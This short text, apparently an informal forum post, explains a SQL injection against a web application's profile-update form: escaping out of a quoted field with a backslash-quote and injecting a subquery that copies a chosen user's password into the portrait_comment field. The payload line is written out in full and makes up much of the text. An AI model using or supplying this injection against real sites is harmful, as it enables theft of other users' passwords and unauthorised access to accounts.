putting a \' into a text field allows you to break out (the \
escapes the first ' and the second ' ends the field.).
I used the section for updating user info and set the
portrait_comment=(select password from users where user_id=x)
your message then ends with something like
\', portrait_comment=(select password from users where user_id=x) --
